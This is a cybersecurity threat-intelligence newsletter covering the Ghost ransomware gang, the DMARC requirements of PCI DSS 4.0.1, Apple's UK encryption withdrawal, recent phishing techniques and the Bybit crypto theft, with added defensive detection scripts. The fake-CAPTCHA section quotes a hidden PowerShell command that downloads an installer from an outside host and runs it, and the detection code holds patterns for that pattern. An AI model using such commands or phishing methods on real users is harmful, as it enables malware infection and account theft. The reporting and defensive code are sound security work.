Intelphreak - February 28, 2025
The Ghost/Cring Ransomware Gang's Unique Success; DMARC Required Under PCI DSS On March 31st of 2025; Apple Removes iCloud Encryption for UK; Recent High Efficacy Social Engineering Tactics; North Korean-Linked Attackers Stole $1.46 Billion in Crypto From Bybit Exchange

Precedence: Routine
BLUF: The Ghost/Cring Ransomware Gang's Unique Success; DMARC Will Be Required Under PCI DSS 4.0.1 On March 31st of 2025; Apple Removes End-to-End iCloud Encryption for UK Users; Recent High Efficacy Social Engineering Tactics Include Reverse Proxy 2FA Bypass, Watering Hole Poisoning With Fake CAPTCHAs, Leveraging The Darcula 3.0 Phishing Kit, and Evolved Credential Phishing; North Korean-Linked Attackers Stole $1.46 Billion in Crypto From Bybit Exchange via Supply-Chain Attack
BEGIN TEARLINE
[Adversary TTPs] New Insights on the Ghost Ransomware Gang and their Peculiar Success
On February 19th, 2025, the FBI, CISA, and MS-ISAC released a joint cybersecurity advisory on the Ghost (also known as Cring) ransomware gang (linked here). Ghost has victims in over 70 countries and specifically targets internet-facing systems with known, unpatched vulnerabilities (some of which are over a decade old!). This gang is also known as Cring, Cring Hand, RSA Virus, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture.
That is a lot of names for one group, but it is not the result of sloppy attribution: the group's suite of TTPs makes it remarkably stealthy and hard to follow. I analyze this at length in the blog linked here, which contains new findings that even the FBI/CISA report missed! While reading the recent news reports on the gang, I kept coming back to one question: What makes Ghost, in particular, so effective and successful, especially if they are only exploiting old, known vulnerabilities?
My investigation found that all of the following factors, especially when working in tandem, contribute substantially to Ghost's success, both in profitability and in the difficulty it poses for researchers and prosecutors:
- Threatening double-extortion, while not actually exfiltrating that much data
- "Moving quickly" by taking mere hours or days to complete infiltration, privilege escalation and lateral movement, and final ransomware deployment
- Tailoring attacks and demands to the victim
- Demanding "reasonable" amounts of cryptocurrency equating to tens to hundreds of thousands of dollars, instead of millions like those of other high-profile gangs
- Heavily utilizing Cobalt Strike, open-source tools, and native Windows/PowerShell tools and commands
- Short, minimal, or no persistence
- Lack of domain registration
- Defense evasion, disablement, and impersonation, combined with LOTL
- Anti-forensics and anti-system-recovery
- Anti-debugging/anti-reverse engineering
- Inconsistency and fluidity
- Communication via encrypted email services and TOX (P2P, end-to-end encrypted messaging/video)
- Specific targeting:
- Public-facing applications and devices
- Critical infrastructure, schools and universities, healthcare, government, religious institutions, technology and manufacturing, and SMBs
- Avoiding hardened systems, and moving on when segmented networks are encountered that impede lateral movement
- Imitating/being imitated by other ransomware groups
In combination with the above factors, this group augments its success with the inconsistent use of at least 7 different executable ransomware payloads, 9-26+ different encrypted file extensions, at least 9 different ransom notes, and at least 41 different email addresses used to contact them.
Analyst comments: (SirPicklJohn) Again, please check out this linked blog to see the following:
- a full breakdown of how Ghost differentiates itself,
- the investigation into all of the factors making Ghost uniquely successful,
- recommendations on how to effectively defend against Ghost, and
- lists of all the resources/indicators of compromise currently linked to Ghost.
[Compliance] PCI DSS 4.0.1 Mandates DMARC By 31st March 2025
DMARC (Domain-based Message Authentication, Reporting & Conformance) will become a requirement for PCI DSS version 4.0.1 compliance on March 31st, 2025. Before an organization can implement DMARC, it must first have the following two controls in place:
- Sender Policy Framework (SPF): SPF authenticates email by checking that the IP address of the sending mail server is authorized to send mail for the sender's domain. The domain's DNS records must list the mail servers that are authorized to send on its behalf. This control can prevent email spoofing, where an attacker tricks a user into thinking an email was sent by a trusted entity. A guide to creating SPF records can be found here.
- DomainKeys Identified Mail (DKIM): DKIM lets recipient mail servers verify the sender and the integrity of the email in transit via a digital signature. The sending server computes a hash over selected fields of the message, such as the From header and the body, signs that hash with a private key that only the sender holds, and attaches the result to the email as a DKIM-Signature header. The receiver fetches the matching public key from the sender's DNS records, verifies the signature, and checks that the recovered hash matches the one it computes over the same fields. This confirms that the email really came from the sender's domain and that its content was not manipulated in transit. A guide to setting up DKIM can be found here.
With both of these verification processes in place, DMARC allows an organization to control what happens when a message fails both DKIM & SPF verification. DMARC Policies include doing nothing, quarantining the message, or outright rejecting the message. With DMARC, an organization can gather and analyze data about messages that are failing verification. These metrics can be helpful in measuring malicious use of your domains.
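The following is an added example (not part of the original report or any standard's reference code) showing how a receiving server combines the SPF and DKIM results described above with the domain owner's published DMARC policy; the record text, domains and authentication results are constructed, and organizational-domain detection is simplified to the last two labels.

```python
"""DMARC evaluation: a message passes when SPF or DKIM passes AND the
authenticated domain aligns with the visible From: domain; otherwise the
policy published in the _dmarc TXT record decides what happens.
Added example with constructed inputs; not from the original report."""
from dataclasses import dataclass

@dataclass
class AuthResult:
    """Results the receiving mail server has already computed for one message."""
    header_from_domain: str   # domain of the visible From: header
    spf_pass: bool
    spf_domain: str           # domain SPF was checked against (envelope MAIL FROM)
    dkim_pass: bool
    dkim_domain: str          # d= tag of a DKIM-Signature that verified

def parse_dmarc_record(txt: str) -> dict:
    """Parse a _dmarc TXT record such as 'v=DMARC1; p=reject; adkim=s' into tags."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC1 record")
    # Alignment defaults to relaxed ('r') when adkim/aspf are absent.
    tags.setdefault("adkim", "r")
    tags.setdefault("aspf", "r")
    return tags

def org_domain(domain: str) -> str:
    """Organizational domain, approximated as the last two labels; production
    code should use the Public Suffix List (think example.co.uk)."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])

def aligned(auth_domain: str, from_domain: str, mode: str) -> bool:
    """Strict ('s') alignment needs an exact match; relaxed ('r') accepts subdomains."""
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)

def dmarc_disposition(record_txt: str, r: AuthResult) -> str:
    """Return 'pass', or the policy to apply: 'none', 'quarantine' or 'reject'."""
    tags = parse_dmarc_record(record_txt)
    spf_ok = r.spf_pass and aligned(r.spf_domain, r.header_from_domain, tags["aspf"])
    dkim_ok = r.dkim_pass and aligned(r.dkim_domain, r.header_from_domain, tags["adkim"])
    if spf_ok or dkim_ok:
        return "pass"
    policy = tags.get("p", "none")
    return policy if policy in ("none", "quarantine", "reject") else "none"

if __name__ == "__main__":
    record = "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"
    cases = {
        # Legitimate mail DKIM-signed by a subdomain of the From: domain: passes.
        "legit, dkim aligned (relaxed)": AuthResult("example.com", False, "", True, "mail.example.com"),
        # Spoofed From: header; the attacker's own domain passes SPF but is not aligned.
        "spoof, spf pass but unaligned": AuthResult("example.com", True, "attacker.example", False, ""),
        # Neither mechanism passes at all.
        "spoof, nothing passes": AuthResult("example.com", False, "", False, ""),
    }
    for label, result in cases.items():
        print(f"{label:32} -> {dmarc_disposition(record, result)}")
```

The second case is the one SPF alone cannot catch: the attacker's envelope domain legitimately passes SPF, and only the alignment check against the From: header makes the message fail.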
Analyst Comments: (ResidentGood) This update is very beneficial as requirements yield more compliance than guidelines. Even if your organization is outside the scope of PCI DSS, DMARC can be a very useful tool for staying on top of domain security. Managed Service Providers with clients that handle card data must ensure compliance by implementing DMARC before the 31st of March, 2025. After that date it will be looked for during PCI DSS audits. A solid guide on setting up DMARC can be found here.
[Law] Apple Pulls Advanced Data Protection from UK Users
Apple confirmed on Friday, February 21st, in an exclusive statement to TechCrunch, that it will be pulling its iCloud Advanced Data Protection (ADP) feature for users in the UK (current and new). Apple spokesperson Fred Sainz said the company is gravely disappointed that it will not be able to offer this feature to its UK users. Advanced Data Protection is an optional feature that lets users enable end-to-end encryption for most of their iCloud data, including backups, photos, and notes. This keeps data secure between user devices and Apple's iCloud servers, and it also protects against manipulation of the data.

- The UK government issued a Technical Capability Notice to Apple demanding full access to encrypted user iCloud data (originally reported by the Washington Post). Apple will likely appeal this notice to a secret panel and a judge in the UK; however, it is against the law to not comply with the notice during the appeals process, or to reveal the details of the secret notice.
- This order was issued under the UK Investigatory Powers Act of 2016, which is quite controversial amongst privacy advocates across the globe. The purpose of this legislation is to enhance the capabilities of security agencies, intelligence agencies, law enforcement agencies, and public authorities to intercept and access communications. The law was designed with independent oversight and safeguards to protect the civil liberties of UK citizens. On February 6th and 7th of 2025, a representative of the UK Home Office said “We do not comment on operational matters, including for example confirming or denying the existence of any such notices…” according to multiple media publications.
- Data like health information, iMessages, FaceTime calls, and keychain credentials will still be protected by Apple encryption. Data that is not protected by end-to-end encryption will be readable both by Apple and by entities that successfully obtain a subpoena for that information. Apple cannot automatically disable ADP for UK users that have it enabled, but it will require the user to disable it in order to keep using their iCloud account. This would aid law enforcement efforts to collect evidence on suspects that use iCloud encryption.
- On February 25th, the US Director of National Intelligence, Tulsi Gabbard, wrote a letter to two US legislators stating that the US is investigating whether this development will affect US Apple users and violate a bilateral agreement between the US and the UK. The treaty in question is the CLOUD Act, which prevents both the US and the UK from demanding data on the citizens of the other country.
- Apple has quite a history of legal conflicts with government entities over protecting the privacy of its users. The most famous case was in 2016, when it won a case against a US government order to unlock the iPhone of a suspected terrorist. In a 2022 statement to The Guardian, UK government officials came out against Apple introducing end-to-end encryption for cloud storage.
Analyst Comments: (ResidentGood) It is hard to find official information on this story as the order itself has not been released to the public. Privacy advocates are railing against this development as they claim it sets a precedent for more authoritarian governments to follow suit. While protecting victims is a high priority, building vulnerabilities in technology can lead to greater breaches of privacy & cyberattacks. Having more information about security controls that are not in place in certain jurisdictions makes it easier for attackers to target victims in those jurisdictions. Stories like this one are important to follow because they can set greater precedents for the cybersecurity industry as a whole.
[Adversary TTPs] The Latest High-Efficacy Tactics Used in Social Engineering Attacks
Social engineering and phishing attacks remain a constant concern in cybersecurity! The following four case studies represent some of the high-efficacy attack techniques that threat actors have been using in the wild recently:
"EvilProxy" Reverse Proxy Attacks
In this kind of attack, the session cookie/token of a user is stolen by the adversary using something called a "reverse proxy", which acts as an intermediary between the end-user and the cloud service (such as Microsoft 365). This bypasses the need for a user to input login credentials or utilize MFA tokens, as the user's session has already been authenticated with these.
Attack Chain Breakdown:
- Phishing email is sent to the victim (potentially from a compromised user that the victim trusts).
- The link in the email goes to a bogus intermediary site, such as the following:
- Note the code of the malicious site, which contains an encoded link to the reverse proxy:
- aHR0cHM6Ly8wLmluZHVzdHJpYWx0cnVja3Muc2l0ZS8/dXNlcm5hbWU9 (this is an example of obfuscation for defense evasion)
- hXXps[:]//0[.]industrialtrucks[.]site/?username=
- The code above takes the email address that the user enters and then makes a request with it as a parameter to the industrialtrucks site, which is the actual reverse proxy that compromises the user.
- If the victim user is logged into the targeted cloud service in another tab, then that already-authenticated session is passed through the reverse proxy (compromising the session), to the legitimate cloud service.
- With access to the account, the attacker is able to then employ a variety of post-exploitation techniques:
- As observed in this case, the attacker can add email forwarding rules (MITRE ATT&CK Technique T1114.003) to siphon emails from another person the victim knows, moving them immediately out of the victim's inbox into an inconspicuous folder the attacker monitors, so the victim never knows the email arrived. The attacker then uses those emails to target that other person.
- The initial phishing email, or new phishing emails, can be sent to other personnel.
- Data in the account can begin to be exfiltrated.
Watering-Hole Attack with Fake CAPTCHAs
In this attack, a legitimate website (or a plugin that legitimate sites use) is compromised and seeded with malicious code that in turn compromises the end users who browse the site, hence the name: the attacker poisons the watering hole. One implementation is the fake CAPTCHA attack, in which a bogus CAPTCHA copies a malicious PowerShell script to the user's clipboard and instructs them to press a series of keyboard shortcuts that execute it.
Attack Chain:
- User browses a legitimate website (which has subtly been compromised), and after about 30-60 seconds, a black overlay appears with a CAPTCHA: (note that the image has been heavily obfuscated/redacted to protect the identity of the victim)
- After clicking on the CAPTCHA, the user is walked through a series of steps to copy and paste the malicious PowerShell script:
(Note that you can even see the "Successful" dialogue box pop up to indicate that the script was copied to the user's clipboard.)
- The following script (with demilitarized links/extensions) is copied:
cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\3aw[.]msi'; Invoke-RestMethod -Uri 'https[:]//qq51f[.]short[.]gy/1' -OutFile $path; Start-Process $path;
- Malware is installed on the victim's computer, before doing all the nasty things that malware can do.
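As an added defensive example (not from the original report), the following scores process command lines for the co-occurring traits of the script shown above, a pattern commonly called ClickFix: a minimized cmd launcher, a hidden PowerShell window, a web download into C:\Users\Public, and immediate execution of the dropped file. The sample command lines are constructed, with a placeholder download host in place of the real one.

```python
"""Score process command lines for the fake-CAPTCHA / clipboard-paste pattern:
a hidden PowerShell that downloads to C:\\Users\\Public and runs the file.
Added example; sample command lines are constructed and use placeholder hosts."""
import re
from typing import List

# Individual switches are common in legitimate admin scripts, so the signal is
# several of these co-occurring in one command line, not any single hit.
INDICATORS = [
    ("cmd_start_min",   re.compile(r"\bcmd(?:\.exe)?\s+/c\s+start\s+/min\b", re.I)),
    ("hidden_window",   re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)),
    ("no_profile",      re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("web_download",    re.compile(r"\b(?:Invoke-RestMethod|Invoke-WebRequest|irm|iwr)\b", re.I)),
    ("public_dir_drop", re.compile(r"[a-z]:\\+users\\+public\\+", re.I)),
    ("exec_dropped",    re.compile(r"\bStart-Process\b|\bmsiexec\b", re.I)),
]

def matched_indicators(cmdline: str) -> List[str]:
    """Return the names of all indicators present in one command line."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]

def is_suspicious(cmdline: str, threshold: int = 3) -> bool:
    """Flag a command line when at least `threshold` indicators co-occur."""
    return len(matched_indicators(cmdline)) >= threshold

def triage(cmdlines: List[str], threshold: int = 3) -> List[str]:
    """Return only the command lines that cross the threshold, for analyst review."""
    return [c for c in cmdlines if is_suspicious(c, threshold)]

# Constructed samples: the first mirrors the structure of the script in the
# report (placeholder host and file name); the other two are routine admin use.
SAMPLE_CMDLINES = [
    r"cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command "
    r"$path='c:\\users\\public\\payload.msi'; "
    r"Invoke-RestMethod -Uri 'https://shortener.example.invalid/1' -OutFile $path; "
    r"Start-Process $path;",
    r"powershell -NoProfile -ExecutionPolicy Bypass -File C:\scripts\nightly_backup.ps1",
    r"powershell -Command Get-Service | Where-Object Status -eq 'Stopped'",
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        hits = matched_indicators(c)
        print(f"{'ALERT' if len(hits) >= 3 else 'ok   '} {hits}")
```

Feed this the command-line field from your EDR or Sysmon process-creation events; a PowerShell spawned this way from the Run dialog is the practical tell, so pair the score with the parent process when that field is available.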
Further analysis of this specific attack (who's behind it?):
- In this attack, qq51f[.]short[.]gy/1 (hosted on short.io, a URL-shortening service) was requested, which in turn downloaded the malicious 01.brr file from the hosting site hXXps[:]//bestiamos[.]com/. Note that bestiamos, hosted by Cloudflare on 104[.]21[.]35[.]172 (replicated on 172[.]67[.]178[.]15, likely for redundancy/backup), hosts 694 other domains (source: whois.com). The registrant name "Julia Smith" is likely bogus and the address does not exist, but the registrant's email (gustavusabseits[@]gmail.com) has been used to register at least 225 other domains (source: whois.com).
Artifacts from the attack:
- 3aw.msi
- Author: Plash Amrita
- Program name: WiX Toolset (4.0.0.0)
- Requests to download 01.brr
- Various folders:
- fr_patch_test
- Girlfriend
- helpAdvanced_test
- Womenfolk
- Miscellaneous Malicious Files:
- taskbg_v1_x64.lnk
- sqsign.lnk
- MSBuild.exe (in Microsoft.NET folder)
- RoboTaskLite.exe
- fell.jpg
- residentiary.php
- rtl280.bpl
- vcl280.bpl
- Requests to qq51f[.]short[.]gy or bestiamos[.]com
- The following Solana crypto address: 5V12gWimv9jG6xBfnQ1txHc3vg5rvA3cjaSeYiVs3YXp (found on an illegitimate lookalike [gettrumpmeme[.]us] of the official TRUMP memecoin site [gettrumpmemes.com] - the attacker registered 6 lookalikes in total)
- I did not take the time to run whois lookups on every single domain that was registered by gustavusabseits[@]gmail.com, but they may offer more insight into the source of this attack!
PhaaS and Site-Cloning by Darcula
Sophisticated phishing attacks are easier for novice attackers to execute than ever before! The threat actor "darcula" recently hit the news by announcing a major feature update to their Chinese, playfully cat-themed "darcula-suite" PhaaS (Phishing-as-a-Service) platform. Darcula was originally discovered in July 2023 by the researcher Oshri Kalfon (who has a brilliant writeup on what he found, which you can check out here: part 1, part 2), and the newly released version (v3) of the platform offers its users the following features for protection, ease of use, and robust fraud:
- User-Friendly, Enterprise-Grade Administrator Dashboard:
- Developed with Docker, Node, React, SQLite, and 3rd-party NPM libraries. These all increase user-experience and accessibility.
- Simplified campaign management
- Performance dashboard
- Real-time logs of stolen credentials, where victims are browsing, etc.
- Automatic Telegram notifications after someone falls victim
- Ability to Send RCS and iMessage Texts:
- This bypasses SMS firewalls and employs end-to-end encryption (reducing the efficacy of filters and detection mechanisms)
- Anti-Detection Features:
- Randomized deployment paths to prevent hostname-level analysis
- IP blocking
- User-agent blocking to stop crawlers and scrapers
- Device-type restrictions
- Client-side page rendering with React, requiring a headless browser that prevents detection by some tools and providers
- Tips from darcula, including hiding the origin server via CDN providers such as Cloudflare
- Automated Credit Card Theft and Conversion Tools:
- Stolen credit card data can be turned into virtual card images for use in digital wallets/payment apps (like Apple Pay)
- Note: Darcula-linked Telegram groups are already selling burner phones with pre-loaded stolen cards.
- Custom Phishing Kit Generator:
- This is one of the most consequential features, allowing users to clone any website with Puppeteer and modify elements like login fields, payment forms, 2FA prompts, etc. Pre-made templates are available.
The Darcula-Suite, with the user editing elements of a cloned USPS site in preparation of an attack.
Note that Netcraft, a cybercrime disruption and takedown company that is one of the main researchers investigating darcula, has highlighted how prolific darcula phishing sites are. Using a worldwide proxy network and various tactics to bypass the darcula platform's defenses (read their report here), since 2024 Netcraft has...
- detected 120 new domains hosting darcula phishing pages each day;
- blocked about 96,600 Darcula 2.0 domains;
- blocked about 20,200 phishing sites; and
- blocked 30,900 IP addresses associated with darcula sites.
With version 3.0 of darcula-suite released, it is harder to detect and stop darcula attacks, the "average sophistication" of PhaaS and phishing campaigns is increasing, and sophisticated phishing attacks are even more accessible to anybody who wants to use them.
Classic Credential Phishing
These haven't gone away either! However, due to advances in security filtering and phishing detection, the sophistication of credential phishing pages has also evolved, with an attack chain looking like the following:
- A phishing email (e.g., a fake "Request For Information" response email) is sent to the end user, who clicks a link to an external file hosting site. Using this intermediary site helps phishing emails bypass security mechanisms because it does not actually contain any malicious code.
- The links in the external file hosting site, after being clicked, redirect the user to the actual phishing page that impersonates a service like Microsoft 365.
Note that this landing page, after getting past the CAPTCHA on the /BoDc/ page, was located at a different URL every time it was visited. Additionally, after compromising the user, the attacker was free to do any other post-exploitation activities:
- Sending similar phishing emails to other users in the victim's address list (and then responding if they question the legitimacy of the email).
- Stealing sensitive documents and data stored in the victim's account.
- Registering their own MFA (if a previous MFA token or code was stolen) for persistence.
- Employing MITRE ATT&CK Technique T1114.003 (Email Forwarding Rule).
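Both the EvilProxy case and this credential-phishing case end with the same post-exploitation step, an inbox rule that forwards or hides mail (T1114.003). The hunt below is an added example, not from the original report or from Microsoft; the audit records are constructed to approximate the shape of Exchange Online unified audit log entries (Operation, UserId, ClientIP and a Parameters list of name/value pairs), and the organization domain and the list of folders used to park siphoned mail are assumptions.

```python
"""Hunt for mailbox rules that forward mail externally or keep it out of the
user's sight (MITRE ATT&CK T1114.003). Added example; the audit records below
are constructed to approximate Exchange Online unified audit log JSON."""
import json
from typing import Dict, List

ORG_DOMAIN = "example.com"          # assumption: the defender's own mail domain
RULE_OPERATIONS = {"New-InboxRule", "Set-InboxRule"}
FORWARD_PARAMS = {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"}
# Assumed list of folders users rarely open, often used to park siphoned mail.
PARKING_FOLDERS = {"RSS Subscriptions", "RSS Feeds", "Conversation History",
                   "Archive", "Junk Email", "Deleted Items"}

def parse_record(audit_json: str) -> Dict:
    """Decode one AuditData JSON document."""
    return json.loads(audit_json)

def rule_parameters(record: Dict) -> Dict[str, str]:
    """Flatten the Parameters list ([{Name, Value}, ...]) into a name -> value map."""
    return {p["Name"]: str(p["Value"]).strip('"') for p in record.get("Parameters", [])}

def assess_rule(record: Dict) -> List[str]:
    """Return the reasons a rule event looks like T1114.003, or [] if it looks benign."""
    if record.get("Operation") not in RULE_OPERATIONS:
        return []
    params = rule_parameters(record)
    reasons: List[str] = []
    for name in sorted(FORWARD_PARAMS.intersection(params)):
        for target in params[name].split(";"):
            target = target.strip()
            if target and not target.lower().endswith("@" + ORG_DOMAIN):
                reasons.append(f"{name} sends mail to external address {target}")
    if params.get("DeleteMessage", "").lower() == "true":
        reasons.append("matching mail is deleted on arrival")
    folder = params.get("MoveToFolder")
    marked_read = params.get("MarkAsRead", "").lower() == "true"
    if folder and (folder in PARKING_FOLDERS or marked_read):
        reasons.append(f"matching mail is parked in '{folder}'"
                       + (" and marked read" if marked_read else ""))
    # A suspicious rule scoped to one sender is the "siphon a trusted contact" pattern.
    if reasons and "From" in params:
        reasons.append(f"rule is scoped to sender {params['From']}")
    return reasons

def hunt(audit_records: List[str]) -> List[Dict]:
    """Run assess_rule over raw audit JSON and return only the suspicious events."""
    findings = []
    for raw in audit_records:
        rec = parse_record(raw)
        reasons = assess_rule(rec)
        if reasons:
            params = rule_parameters(rec)
            findings.append({"time": rec.get("CreationTime"), "user": rec.get("UserId"),
                             "client_ip": rec.get("ClientIP"),
                             "rule": params.get("Name") or params.get("Identity"),
                             "reasons": reasons})
    return findings

# Constructed records (RFC 5737 documentation IPs, fictional users and senders).
SAMPLE_AUDIT_RECORDS = [
    json.dumps({"CreationTime": "2025-02-10T14:02:11", "Operation": "New-InboxRule",
                "UserId": "alice@example.com", "ClientIP": "203.0.113.7",
                "Parameters": [{"Name": "Name", "Value": "."},
                               {"Name": "From", "Value": "cfo@partner.example"},
                               {"Name": "MoveToFolder", "Value": "RSS Subscriptions"},
                               {"Name": "MarkAsRead", "Value": "True"}]}),
    json.dumps({"CreationTime": "2025-02-10T15:30:45", "Operation": "New-InboxRule",
                "UserId": "bob@example.com", "ClientIP": "198.51.100.20",
                "Parameters": [{"Name": "Name", "Value": "Vendor newsletters"},
                               {"Name": "From", "Value": "news@vendor.example"},
                               {"Name": "MoveToFolder", "Value": "Newsletters"}]}),
    json.dumps({"CreationTime": "2025-02-11T03:12:09", "Operation": "Set-InboxRule",
                "UserId": "carol@example.com", "ClientIP": "203.0.113.77",
                "Parameters": [{"Name": "Identity", "Value": ".."},
                               {"Name": "ForwardTo", "Value": "collector@attacker-mail.example"},
                               {"Name": "DeleteMessage", "Value": "True"}]}),
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_AUDIT_RECORDS):
        print(json.dumps(finding, indent=2))
```

Bob's rule, which moves a vendor newsletter into a folder of the same name, produces no finding, which is the point of requiring a parking folder or mark-as-read before a move rule is flagged.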
Analyst Comments: (SirPicklJohn) Thanks for reading! Hopefully this gives you an inside view into the real-world attacks and techniques that are currently being used in the wild! Defenders can implement the following steps to effectively mitigate these attacks:
- SETA: First and foremost, implement a robust security education, training, and awareness (SAT/SETA) program, with the leader of it being an articulate individual who understands its immense value. Sometimes, the only thing that prevents (or enables!) an attack is the human element!
- Tips on MFA, from One Defender to Another: Rather than leaving you with the endlessly-repeated advice to "enable multifactor authentication on all cloud accounts", which you should do, I'd like to also say that there are still plenty of people who have never used multifactor authentication before and do not know what it is. You will likely receive pushback when mandating organization-wide multifactor authentication, but you need to stand firm, calmly articulate how important it is, and walk users through the process while troubleshooting their issues. Additionally, "phishing-resistant MFA" can prevent basic attacks like the credential phishing attack above by sending push notifications or displaying a window for a security key rather than just asking for a code - this is because a phishing site like blelinelipor will not be able to send a push notification to a user's phone or utilize the user's security key to compromise the account, while the site can still ask for and use a valid MFA code.
- Conditional Access Policies: Conditional access policies are strong security controls that restrict or grant user access based on "if-then" statements. For example, "geofencing" users by restricting their logins to certain geographic areas, requiring all users to use a certain kind of MFA, allowing or denying logins from certain types of devices on certain types of networks and IP ranges, etc.
Thank you for reading - stay safe!
[Major Incident] Hackers Steal $1.46 Billion in Cryptocurrency Assets From Bybit Exchange
On Friday, February 21, 2025, the popular Dubai-based cryptocurrency exchange Bybit lost $1.46 billion (in USD) in a cyberattack. The attackers stole this sum in the form of Ethereum and Staked Ether by creating malicious transactions to transfer the funds from a cold wallet (a crypto wallet where the private keys are stored offline) to a wallet address controlled by the threat actor. After exfiltration, the funds were laundered to prevent tracing.
According to Bybit, several third parties collaborated in investigating and containing this situation, including:
- Forensic Analysis: Mandiant, Verichains, and Sygnia.co
- Bad Actor Tracing & Identification: ZeroShadow
- Tagging Exploited Addresses on Blockchains: Chainalysis, Elliptic, TRM, Goplus, SEAL911, and ZachXBT
- Security Advisory: SlowMist, BlockSec, BEOSIN
- Compliance & Risk Assessment: VerifyVASP, AML Bot, CryptoForensic
- Cross-chain security Measures: Binance, Coinbase, Bitget, Polygon, Arbitrum, Optimism, Wormhole, Synapse, Connext, Chainflip, Across.to, Symbiosis.finance, AVAX, ChangeNow, fixedfloat, and cBridge
The contract with malicious transfer logic was located at 0x96221423681A6d52E184D440a8eFCEbB105C7242
The contract with malicious withdrawal abilities was located at 0xbDd077f651EBe7f7b3cE16fe5F2b025BE2969516
According to the preliminary investigation report from Verichains: “[t]he attacker successfully created a multi-signature transaction involving three signers, including the CEO of Bybit. This transaction upgraded Bybit’s multi-signature contract for Cold Wallet 1 (0x1Db92e2EbE8E0c075a02BeA49a2935BcD2dFCF4) on Safe.Global, pointing to a malicious contract (0xbDd077f651EBe7f7b3cE16fe5F2b025BE2969516) that was deployed three days earlier.” For emptying the wallets, the sweepETH & sweepERC20 backdoors were used.
List of Initial Threat Actor Addresses:
Sygnia’s investigation found direct injection of malicious JavaScript into a Safe{Wallet} Amazon S3 bucket. This code was designed to alter crypto transactions during signing. It was also designed to activate only for transactions involving Bybit’s main contract address and an unknown test address controlled by the attacker. After execution, the injected S3 resource was replaced with one that did not contain the malicious JavaScript, a technique to avoid detection. Since the attack came from Safe{Wallet}’s infrastructure, the investigation found that Bybit’s infrastructure had not been directly compromised.
During the incident response process, Bybit migrated its funds out of Safe{Wallet} addresses. Bybit created an API of continuously updated suspicious wallet addresses that have been blacklisted. They have also released a HackBounty website to get help from the industry in tracking down the hackers’ wallet. Successful interceptions will receive a 10% commission. As of February 24, Bybit claims to have replaced 100% of the stolen funds via loans, large deposits from abundant crypto owners, and purchases of Ethereum.
The FBI confirmed that this attack was carried out by a North Korean APT known as TraderTraitor which has ties to the Lazarus Group. This group is also tracked under the names APT38, BlueNoroff, and Stardust Chollima.
Safe{Wallet} confirmed in a public statement that the compromise of a developer machine led to this incident. They claimed that SAFE contracts were not affected by the incident. In response, Safe conducted an investigation, restored Safe{Wallet} to the main Ethereum chain in phases, reconfigured infrastructure and changed all credentials.
Analyst Comments: (ResidentGood) This is one of the largest cryptocurrency exfiltrations in recent history. The threat actor being tied to North Korea lines up with the trend of North Korean APTs using state-sponsored cyber attacks to finance military operations. This story highlights the importance of cryptocurrency organizations to secure themselves from supply-chain attacks. Your security controls are not as effective if another organization that is integrated into your tech stack is compromised.
END REPORT
If you are interested in anything Cybersecurity, come check out our Discord
Sources:
The Latest High-Efficacy Social Engineering Attack Tactics
- Note that all of the information, unless cited below, on these tactics/sub-stories (besides the one on Darcula) is sourced from cyberattack investigations by SirPicklJohn in recent months. These tactics continue to be observed in the present-day.
- "Darcula - 达尔库拉" - Oshri Kalfon (July 30, 2023)
- "Darcula - 达尔库拉 Part 2" - Oshri Kalfon (August 2, 2023)
- "Darcula PhaaS 3.0 Auto-Generates Phishing Kits for Any Brand" (February 21, 2025)
- "Cybercriminals Can Now Clone Any Brand's Site in Minutes Using Darcula PhaaS v3" (February 21, 2025)
- "Cybercriminals Can Now Clone Any Brand's Site in Minutes Using Darcula PhaaS v3" (February 20, 2025)
- "Out of the shadows – ’darcula’ iMessage and RCS smishing attacks target USPS and global postal services" (March 27, 2024)
- "New Darcula iMessage Attack Targets iPhone Users In 100 Countries" (March 28, 2024)
- "Email Collection: Email Forwarding Rule" - MITRE ATT&CK (October 14, 2024)
- "EvilProxy Phishing Attack Strikes Indeed" (October 1, 2023) <- Note that this source was used to provide me (SirPicklJohn) with the initial context of what an EvilProxy attack was when I was faced with one in the wild, over a year after this source was posted.
PCI DSS 4.0.1 Mandates DMARC By 31st March 2025
- PCI-DSS v4.0.1 (June 11, 2024)
- Just Published: PCI DSS v4.0.1 (June 11, 2024)
- Implementing DMARC to Meet PCI DSS V4.0 Requirements (August 18, 2023)
- DMARC for PCI DSS 4.0 Compliance – Mandatory from 2025 (January 12, 2025)
- PCI DSS 4.0 Mandates DMARC By 31st March 2025 (February 20, 2025)
- What Is DKIM? (n.d.)
- Set up SPF (n.d.)
- How to Easily Set Up a DKIM Record - Step-by-Step Guide (January 16, 2025)
Apple Pulls Advanced Data Protection from UK Users
- Apple pulls iCloud end-to-end encryption feature for UK users after government demanded backdoor (February 21, 2025)
- U.K. orders Apple to let it spy on users’ encrypted accounts (February 7, 2025)
- How to turn on Advanced Data Protection for iCloud (September 16, 2024)
- Definition: end-to-end encryption (E2EE) (June 2021)
- Apple vows to resist FBI demand to crack iPhone linked to San Bernardino attacks (February 17, 2016)
- Privacy changes set Apple at odds with UK government over online safety bill (December 8, 2022)
- Investigatory Powers Act 2016 (March 25, 2022)
- UK Home Office silent on alleged Apple backdoor order (February 7, 2025)
- The software UK techies need to protect themselves now Apple's ADP won’t (February 24, 2025)
- Apple pulls end-to-end encryption in UK, spurning backdoors for gov’t spying (February 21, 2025)
- US examining whether UK's encryption demand on Apple broke data treaty (February 26, 2025)
- Concerns Over Apple's UK iCloud Encryption Deactivation (February 24, 2025)
- Apple Withdraws Strong Encryption Feature for All UK Users (February 21, 2025)
- Apple pulls iCloud end-to-end encryption feature in the UK (February 21, 2025)
